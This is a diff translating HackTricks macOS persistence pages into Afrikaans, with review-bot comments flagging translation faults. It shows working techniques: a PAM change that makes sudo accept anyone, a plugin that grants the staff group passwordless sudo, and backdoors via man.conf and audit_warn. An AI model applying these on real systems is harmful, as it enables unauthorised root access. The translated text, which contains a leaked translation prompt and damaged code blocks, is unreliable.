{% endhint %} -### Periodic +### Periodiek -Writeup: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic` - * Root required - * **Trigger**: When the time comes -* `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` - * Root required - * **Trigger**: When the time comes +* Root vereis +* **Trigger**: Wanneer die tyd aanbreek +* `/etc/daily.local`, `/etc/weekly.local` of `/etc/monthly.local` +* Root vereis +* **Trigger**: Wanneer die tyd aanbreek -#### Description & Exploitation +#### Beskrywing & Uitbuiting -The periodic scripts (**`/etc/periodic`**) are executed because of the **launch daemons** configured in `/System/Library/LaunchDaemons/com.apple.periodic*`. Note that scripts stored in `/etc/periodic/` are **executed** as the **owner of the file,** so this won't work for a potential privilege escalation. +Die periodieke skripte (**`/etc/periodic`**) word uitgevoer as gevolg van die **aanvangsdemone** wat gekonfigureer is in `/System/Library/LaunchDaemons/com.apple.periodic*`. Let daarop dat skripte wat in `/etc/periodic/` gestoor word, **uitgevoer** word as die **eienaar van die lêer,** so dit sal nie werk vir 'n potensiële bevoorregte eskalasie nie. {% code overflow="wrap" %} ```bash 
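Review bot: every fenced code block in this hunk is re-emitted with its leading indentation stripped (`-    "/System/Library/Spotlight/iWork.mdimporter",` becomes `+"/System/Library/Spotlight/iWork.mdimporter",`, and the nested `plutil -p` output under `CFBundleDocumentTypes` and `UTTypeTagSpecification` is flattened the same way), although the workflow's own rule is that code is not to be touched. The blank line that separated the prose from each opening fence is dropped as well. Code blocks should show up as unchanged context in this diff; pass them through byte-for-byte and keep the blank line before each fence so the nesting of the command output stays readable.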
@@ -1288,19 +1251,17 @@ total 8 ``` {% endcode %} -There are other periodic scripts that will be executed indicated in **`/etc/defaults/periodic.conf`**: - +Daar is ander periodieke skripte wat uitgevoer sal word soos aangedui in **`/etc/defaults/periodic.conf`**: ```bash grep "Local scripts" /etc/defaults/periodic.conf daily_local="/etc/daily.local" # Local scripts weekly_local="/etc/weekly.local" # Local scripts monthly_local="/etc/monthly.local" # Local scripts ``` - -If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**. +As jy enige van die lêers `/etc/daily.local`, `/etc/weekly.local` of `/etc/monthly.local` kan skryf, sal dit **vroeër of later uitgevoer** word. {% hint style="warning" %} -Note that the periodic script will be **executed as the owner of the script**. So if a regular user owns the script, it will be executed as that user (this might prevent privilege escalation attacks). +Let daarop dat die periodieke skripsie as die eienaar van die skripsie uitgevoer sal word. As 'n gewone gebruiker die skripsie besit, sal dit as daardie gebruiker uitgevoer word (dit kan bevoorregtingaanvalle voorkom). {% endhint %} ### PAM 
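Review bot: in the Periodic hunk the nested list under Location is flattened: `-  * Root required` and `-  * **Trigger**: When the time comes` become top-level `+* Root vereis` and `+* **Trigger**: ...`, so they no longer read as attributes of the path above them, and the same happens to `-  * But you need to be root` under 'Nuttig om sandput te omseil'. Keep the two-space indentation on the sub-items. In the same hunk 'skripsie' in the warning hint means a thesis, while the paragraph just above correctly uses 'skripte'; use 'skrip' throughout.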
@@ -1308,32 +1269,27 @@ Note that the periodic script will be **executed as the owner of the script**. S Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\ Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet 'n root wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek -* Root always required +* Root is altyd vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**. - -Check PAM modules with: +Aangesien PAM meer gefokus is op **volharding** en kwaadwillige sagteware as op maklike uitvoering binne macOS, sal hierdie blog nie 'n gedetailleerde verduideliking gee nie, **lees die writeups om hierdie tegniek beter te verstaan**. +Kontroleer PAM-modules met: ```bash ls -l /etc/pam.d ``` - -A persistence/privilege escalation technique abusing PAM is as easy as modifying the module /etc/pam.d/sudo adding at the beginning the line: - +'n Persistence/privilege escalation-tegniek wat PAM misbruik, is so maklik soos om die module /etc/pam.d/sudo te wysig deur die reël aan die begin by te voeg: ' ```bash auth sufficient pam_permit.so ``` - -So it will **looks like** something like this: - +Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/macos-hardening/macos-auto-start-locations.md. 
Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaksis. Moenie dinge soos kode, hakmetode name, hakwoorde, wolk/SaaS-platformname (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Voeg ook geen ekstra goed by behalwe die vertaling en markdown-sintaksis nie. ```bash # sudo: auth account password session auth sufficient pam_permit.so 
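Review bot: the PAM hunk (`@@ -1308,32 +1269,27 @@`) replaces the lead-in sentence `-So it will **looks like** something like this:` with what is clearly the translation job's own instruction prompt ('Die volgende is inhoud uit 'n hakboek oor hakmetodes. ... Vertaal die relevante Engelse teks na Afrikaans ... Moenie dinge soos kode ... vertaal nie.'), and it also leaves a stray `'` at the end of the line ending 'aan die begin by te voeg:'. That text is not page content and must not be merged; replace it with the translated lead-in (for example 'Dit sal dan min of meer soos volg lyk:') and drop the stray quote. The workflow should reject any output that echoes its own prompt before opening a PR.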
@@ -1344,32 +1300,30 @@ account required pam_permit.so password required pam_deny.so session required pam_permit.so ``` - -And therefore any attempt to use **`sudo` will work**. +En daarom sal enige poging om **`sudo` te gebruik werk**. {% hint style="danger" %} -Note that this directory is protected by TCC so it's highly probably that the user will get a prompt asking for access. +Let daarop dat hierdie gids beskerm word deur TCC, so dit is baie waarskynlik dat die gebruiker 'n versoek om toegang sal kry. {% endhint %} -### Authorization Plugins +### Magtigingsinvoegtoepassings -Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\ -Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) +Verslag: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\ +Verslag: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and make extra configs -* TCC bypass: ??? +* Nuttig om die sandput te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet 'n beheerder wees en ekstra konfigurasies maak +* TCC-omseiling: ??? -#### Location +#### Ligging * `/Library/Security/SecurityAgentPlugins/` - * Root required - * It's also needed to configure the authorization database to use the plugin +* Beheerder vereis +* Dit is ook nodig om die magtigingsdatabasis te konfigureer om die invoegtoepassing te gebruik -#### Description & Exploitation - -You can create an authorization plugin that will be executed when a user logs-in to maintain persistence. 
For more information about how to create one of these plugins check the previous writeups (and be careful, a poorly written one can lock you out and you will need to clean your mac from recovery mode). +#### Beskrywing & Uitbuiting +Jy kan 'n magtigingsinvoegtoepassing skep wat uitgevoer sal word wanneer 'n gebruiker aanmeld om volharding te handhaaf. Vir meer inligting oor hoe om een van hierdie invoegtoepassings te skep, kyk na die vorige verslae (en wees versigtig, 'n swak geskrewe een kan jou buite sluit en jy sal jou Mac van herstelmodus moet skoonmaak). ```objectivec // Compile the code and create a real bundle // gcc -bundle -framework Foundation main.m -o CustomAuth 
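Review bot: in the Authorization Plugins hunk 'you need to be root' is rendered as 'jy moet 'n beheerder wees' and `-  * Root required` as `+* Beheerder vereis`, i.e. an administrator rather than root, which understates the requirement compared with the rest of the file ('Root vereis'); keep 'root' as the other sections do, since root is needed to write to `/Library/Security/SecurityAgentPlugins/` and to run `security authorizationdb write`. The fixed terms are also rendered inconsistently across the file: 'sandput' here versus 'sandboks' and 'sandbox' elsewhere, 'Ligging' versus 'Plek', 'Uitbuiting' versus 'Exploit'; settle on one rendering per term before merging.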
@@ -1380,74 +1334,64 @@ You can create an authorization plugin that will be executed when a user logs-in __attribute__((constructor)) static void run() { - NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); - system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); +NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded"); +system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers"); } ``` - -**Move** the bundle to the location to be loaded: - +**Skuif** die bundel na die plek waar dit gelaai moet word: ```bash cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/ ``` - -Finally add the **rule** to load this Plugin: - +Voeg uiteindelik die **reël** by om hierdie Plugin te laai: ```bash cat > /tmp/rule.plist < - class - evaluate-mechanisms - mechanisms - - CustomAuth:login,privileged - - +class +evaluate-mechanisms +mechanisms + +CustomAuth:login,privileged + + EOF security authorizationdb write com.asdf.asdf < /tmp/rule.plist ``` +Die **`evaluate-mechanisms`** sal die outorisering raamwerk laat weet dat dit 'n **eksterne meganisme vir outorisering moet aanroep**. Verder sal **`privileged`** dit laat uitvoer word deur root. -The **`evaluate-mechanisms`** will tell the authorization framework that it will need to **call an external mechanism for authorization**. Moreover, **`privileged`** will make it be executed by root. - -Trigger it with: - +Trigger dit met: ```bash security authorize com.asdf.asdf ``` - -And then the **staff group should have sudo** access (read `/etc/sudoers` to confirm). +En dan moet die **personeelgroep sudo-toegang** hê (lees `/etc/sudoers` om dit te bevestig). 
### Man.conf Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and the user must use man -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om die sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees en die gebruiker moet man gebruik +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`/private/etc/man.conf`** - * Root required - * **`/private/etc/man.conf`**: Whenever man is used +* Root vereis +* **`/private/etc/man.conf`**: Telkens as man gebruik word -#### Description & Exploit +#### Beskrywing & Uitbuiting -The config file **`/private/etc/man.conf`** indicate the binary/script to use when opening man documentation files. So the path to the executable could be modified so anytime the user uses man to read some docs a backdoor is executed. - -For example set in **`/private/etc/man.conf`**: +Die konfigurasie-lêer **`/private/etc/man.conf`** dui die binêre/skripsie aan wat gebruik moet word wanneer man-dokumentasie-lêers geopen word. Die pad na die uitvoerbare lêer kan dus gewysig word sodat 'n agterdeur uitgevoer word telkens as die gebruiker man gebruik om dokumentasie te lees. +Byvoorbeeld, stel in **`/private/etc/man.conf`**: ``` MANPAGER /tmp/view ``` - -And then create `/tmp/view` as: - +En skep dan `/tmp/view` as: ```bash #!/bin/zsh 
@@ -1455,25 +1399,24 @@ touch /tmp/manconf /usr/bin/less -s ``` - ### Apache2 **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root and apache needs to be running -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) - * Httpd doesn't have entitlements +* Nuttig om sandbox te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees en apache moet loop +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) +* Httpd het nie toestemmings nie -#### Location +#### Plek * **`/etc/apache2/httpd.conf`** - * Root required - * Trigger: When Apache2 is started +* Root nodig +* Trigger: Wanneer Apache2 begin -#### Description & Exploit +#### Beskrywing & Exploit -You can indicate in `/etc/apache2/httpd.conf` to load a module adding a line such as: +Jy kan in `/etc/apache2/httpd.conf` aandui om 'n module te laai deur 'n lyn soos die volgende by te voeg: {% code overflow="wrap" %} ```bash 
@@ -1481,16 +1424,13 @@ LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority" ``` {% endcode %} -This way your compiled moduled will be loaded by Apache. The only thing is that either you need to **sign it with a valid Apple certificate**, or you need to **add a new trusted certificate** in the system and **sign it** with it. - -Then, if needed , to make sure the server will be started you could execute: +Op hierdie manier sal jou saamgestelde modules deur Apache gelaai word. Die enigste ding is dat jy dit óf met 'n geldige Apple-sertifikaat moet **onderteken**, óf jy moet 'n nuwe vertroude sertifikaat in die stelsel **byvoeg** en dit daarmee **onderteken**. +Dan, indien nodig, kan jy verseker dat die bediener gestart sal word deur die volgende uit te voer: ```bash sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist ``` - -Code example for the Dylb: - +Kodevoorbeeld vir die Dylb: ```objectivec #include #include 
@@ -1498,47 +1438,44 @@ Code example for the Dylb: __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { - printf("[+] dylib constructor called from %s\n", argv[0]); - syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); +printf("[+] dylib constructor called from %s\n", argv[0]); +syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]); } ``` - -### BSM audit framework +### BSM ouditraamwerk Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/) -* Useful to bypass sandbox: [🟠](https://emojipedia.org/large-orange-circle) - * But you need to be root, auditd be running and cause a warning -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om die sandboks te omseil: [🟠](https://emojipedia.org/large-orange-circle) +* Maar jy moet root wees, auditd moet loop en 'n waarskuwing veroorsaak +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * **`/etc/security/audit_warn`** - * Root required - * **Trigger**: When auditd detects a warning +* Root vereis +* **Trigger**: Wanneer auditd 'n waarskuwing opspoor -#### Description & Exploit - -Whenever auditd detects a warning the script **`/etc/security/audit_warn`** is **executed**. So you could add your payload on it. +#### Beskrywing & Uitbuiting +Telkens wanneer auditd 'n waarskuwing opspoor, word die skripsie **`/etc/security/audit_warn`** **uitgevoer**. Jy kan dus jou lading daarby voeg. ```bash echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn ``` +Jy kan 'n waarskuwing afdwing met `sudo audit -n`. -You could force a warning with `sudo audit -n`. 
- -### Startup Items +### Begin Items {% hint style="danger" %} -**This is deprecated, so nothing should be found in those directories.** +**Dit is verouderd, so daar behoort niks in daardie gids te wees nie.** {% endhint %} -The **StartupItem** is a directory that should be positioned within either `/Library/StartupItems/` or `/System/Library/StartupItems/`. Once this directory is established, it must encompass two specific files: +Die **StartupItem** is 'n gids wat binne `/Library/StartupItems/` of `/System/Library/StartupItems/` geplaas moet word. Sodra hierdie gids gevestig is, moet dit twee spesifieke lêers bevat: -1. An **rc script**: A shell script executed at startup. -2. A **plist file**, specifically named `StartupParameters.plist`, which contains various configuration settings. +1. 'n **rc-skrip**: 'n skulpskrip wat by begin uitgevoer word. +2. 'n **plist-lêer**, spesifiek genoem `StartupParameters.plist`, wat verskeie konfigurasie-instellings bevat. -Ensure that both the rc script and the `StartupParameters.plist` file are correctly placed inside the **StartupItem** directory for the startup process to recognize and utilize them. +Maak seker dat beide die rc-skrip en die `StartupParameters.plist`-lêer korrek binne die **StartupItem**-gids geplaas word sodat die beginproses dit kan herken en gebruik. {% tabs %} 
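Review bot: translating section headings changes the anchor slugs GitBook generates for them (`-### Startup Items` to `+### Begin Items`, `-### BSM audit framework` to `+### BSM ouditraamwerk`, and earlier `## Root Sandbox Bypass` to `## Root Sandput Omseiling`), so cross-references such as `#startup-items` from other pages will break; either keep headings in English, as the translation rules already do for tool and technique names, or add the corresponding redirects. In the same hunk 'payload' is translated as 'lading' in the `audit_warn` paragraph while it stays 'payload' in the Spotlight section; 'payload' is one of the terms the rules say to leave untouched, so keep it as-is.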
@@ -1548,34 +1485,32 @@ Ensure that both the rc script and the `StartupParameters.plist` file are correc - Description - This is a description of this service - OrderPreference - None - Provides - - superservicename - +Description +This is a description of this service +OrderPreference +None +Provides + +superservicename + ``` -{% endtab %} - -{% tab title="superservicename" %} +{% tab title="superservisenaam" %} ```bash #!/bin/sh . /etc/rc.common StartService(){ - touch /tmp/superservicestarted +touch /tmp/superservicestarted } StopService(){ - rm /tmp/superservicestarted +rm /tmp/superservicestarted } RestartService(){ - echo "Restarting" +echo "Restarting" } RunService "$1" 
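Review bot: this hunk deletes `-{% endtab %}` before the `{% tab title=... %}` line without adding it back, so the StartupParameters.plist tab is never closed and the `{% tabs %}` block will not render; restore the `{% endtab %}` line. The tab title is also changed to `superservisenaam`: it is the file name of the rc script that the `Provides` entry in the plist above refers to, so it must stay `superservicename`. The bodies of `StartService`, `StopService` and `RestartService` lose their indentation here as in the other code blocks and should be left unchanged.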
@@ -1586,51 +1521,47 @@ RunService "$1" ### ~~emond~~ {% hint style="danger" %} -I cannot find this component in my macOS so for more info check the writeup +Ek kan hierdie komponent nie in my macOS vind nie, so vir meer inligting kyk na die writeup {% endhint %} Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/) -Introduced by Apple, **emond** is a logging mechanism that seems to be underdeveloped or possibly abandoned, yet it remains accessible. While not particularly beneficial for a Mac administrator, this obscure service could serve as a subtle persistence method for threat actors, likely unnoticed by most macOS admins. - -For those aware of its existence, identifying any malicious usage of **emond** is straightforward. The system's LaunchDaemon for this service seeks scripts to execute in a single directory. To inspect this, the following command can be used: +Deur Apple geïntroduceer, is **emond** 'n log-meganisme wat lyk asof dit onderontwikkel is of moontlik verlate is, maar dit bly toeganklik. Alhoewel dit nie besonders voordelig is vir 'n Mac-administrator nie, kan hierdie obskure diens dien as 'n subtiele volhardingsmetode vir dreigingsakteurs, moontlik onopgemerk deur die meeste macOS-administrateurs. +Vir diegene wat bewus is van sy bestaan, is dit maklik om enige skadelike gebruik van **emond** te identifiseer. Die stelsel se LaunchDaemon vir hierdie diens soek skripte om uit te voer in 'n enkele gids. 
Om dit te ondersoek, kan die volgende opdrag gebruik word: ```bash ls -l /private/var/db/emondClients ``` - - ### ~~XQuartz~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) -#### Location +#### Plek * **`/opt/X11/etc/X11/xinit/privileged_startx.d`** - * Root required - * **Trigger**: With XQuartz +* Root vereis +* **Trigger**: Met XQuartz -#### Description & Exploit +#### Beskrywing & Exploit -XQuartz is **no longer installed in macOS**, so if you want more info check the writeup. +XQuartz is **nie meer geïnstalleer in macOS nie**, so as jy meer inligting wil hê, kyk na die writeup. ### ~~kext~~ {% hint style="danger" %} -It's so complicated to install kext even as root taht I won't consider this to escape from sandboxes or even for persistence (unless you have an exploit) +Dit is so ingewikkeld om kext te installeer, selfs as root, dat ek dit nie sal oorweeg om uit sandbokse te ontsnap of selfs vir volharding nie (tensy jy 'n uitbuiting het) {% endhint %} -#### Location +#### Plek -In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**: +Om 'n KEXT as 'n opstartitem te installeer, moet dit **geïnstalleer word in een van die volgende plekke**: * `/System/Library/Extensions` - * KEXT files built into the OS X operating system. +* KEXT-lêers wat in die OS X-bedryfstelsel ingebou is. * `/Library/Extensions` - * KEXT files installed by 3rd party software - -You can list currently loaded kext files with: +* KEXT-lêers wat deur derdeparty-programmatuur geïnstalleer is +Jy kan tans gelaai kext-lêers lys met: ```bash kextstat #List loaded kext kextload /path/to/kext.kext #Load a new one based on path 
@@ -1638,46 +1569,44 @@ kextload -b com.apple.driver.ExampleBundle #Load a new one based on path kextunload /path/to/kext.kext kextunload -b com.apple.driver.ExampleBundle ``` - -For more information about [**kernel extensions check this section**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). +Vir meer inligting oor [**kernel-uitbreidings, sien hierdie afdeling**](macos-security-and-privilege-escalation/mac-os-architecture/#i-o-kit-drivers). ### ~~amstoold~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0029/](https://theevilbit.github.io/beyond/beyond\_0029/) -#### Location +#### Ligging * **`/usr/local/bin/amstoold`** - * Root required +* Root vereis -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Apparently the `plist` from `/System/Library/LaunchAgents/com.apple.amstoold.plist` was using this binary while exposing a XPC service... the thing is that the binary didn't exist, so you could place something there and when the XPC service gets called your binary will be called. +Blykbaar het die `plist` vanaf `/System/Library/LaunchAgents/com.apple.amstoold.plist` hierdie binaêre gebruik terwyl dit 'n XPC-diens blootgestel het... die ding is dat die binaêre nie bestaan het nie, so jy kon iets daar plaas en wanneer die XPC-diens geroep word, sal jou binaêre geroep word. -I can no longer find this in my macOS. +Ek kan dit nie meer in my macOS vind nie. ### ~~xsanctl~~ Writeup: [https://theevilbit.github.io/beyond/beyond\_0015/](https://theevilbit.github.io/beyond/beyond\_0015/) -#### Location +#### Ligging * **`/Library/Preferences/Xsan/.xsanrc`** - * Root required - * **Trigger**: When the service is run (rarely) +* Root vereis +* **Trigger**: Wanneer die diens uitgevoer word (seldsaam) -#### Description & exploit +#### Beskrywing & uitbuiting -Apparently it's not very common to run this script and I couldn't even find it in my macOS, so if you want more info check the writeup. 
+Blykbaar is dit nie baie algemeen om hierdie skrip uit te voer nie en ek kon dit selfs nie in my macOS vind nie, so as jy meer inligting wil hê, kyk na die writeup. ### ~~/etc/rc.common~~ {% hint style="danger" %} -**This isn't working in modern MacOS versions** +**Dit werk nie in moderne MacOS-weergawes nie** {% endhint %} -It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script: - +Dit is ook moontlik om hier **opdragte te plaas wat by opstart uitgevoer sal word.** Voorbeeld van 'n gewone rc.common-skrip: ```bash # # Common setup for startup scripts. @@ -1717,16 +1646,16 @@ PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; ex # CheckForNetwork() { - local test +local test - if [ -z "${NETWORKUP:=}" ]; then - test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) - if [ "${test}" -gt 0 ]; then - NETWORKUP="-YES-" - else - NETWORKUP="-NO-" - fi - fi +if [ -z "${NETWORKUP:=}" ]; then +test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l) +if [ "${test}" -gt 0 ]; then +NETWORKUP="-YES-" +else +NETWORKUP="-NO-" +fi +fi } alias ConsoleMessage=echo @@ -1736,25 +1665,25 @@ alias ConsoleMessage=echo # GetPID () { - local program="$1" - local pidfile="${PIDFILE:=/var/run/${program}.pid}" - local pid="" +local program="$1" +local pidfile="${PIDFILE:=/var/run/${program}.pid}" +local pid="" - if [ -f "${pidfile}" ]; then - pid=$(head -1 "${pidfile}") - if ! kill -0 "${pid}" 2> /dev/null; then - echo "Bad pid file $pidfile; deleting." - pid="" - rm -f "${pidfile}" - fi - fi +if [ -f "${pidfile}" ]; then +pid=$(head -1 "${pidfile}") +if ! kill -0 "${pid}" 2> /dev/null; then +echo "Bad pid file $pidfile; deleting." +pid="" +rm -f "${pidfile}" +fi +fi - if [ -n "${pid}" ]; then - echo "${pid}" - return 0 - else - return 1 - fi +if [ -n "${pid}" ]; then +echo "${pid}" +return 0 +else +return 1 +fi } # 
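Review bot: 'binaêre' in the amstoold paragraph is misspelled (three times); the Afrikaans form is 'binêre'. In the rc.common block the whole script body is re-indented to column 0 (`-    local test` to `+local test`, and the `if`/`fi` nesting inside `CheckForNetwork` and `GetPID`), which makes the control flow hard to follow even though bash still executes it; this is code the translator should not be emitting changes for, and the diff should show it as unchanged context.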
@@ -1762,30 +1691,29 @@ GetPID () # RunService () { - case $1 in - start ) StartService ;; - stop ) StopService ;; - restart) RestartService ;; - * ) echo "$0: unknown argument: $1";; - esac +case $1 in +start ) StartService ;; +stop ) StopService ;; +restart) RestartService ;; +* ) echo "$0: unknown argument: $1";; +esac } ``` - -## Persistence techniques and tools +## Volhardingstegnieke en -gereedskap * [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) * [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md index 9d17b9456..fde176cf7 100644 --- a/macos-hardening/macos-red-teaming/README.md +++ b/macos-hardening/macos-red-teaming/README.md @@ -1,88 +1,86 @@ -# macOS Red Teaming +# macOS Rooi-span
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
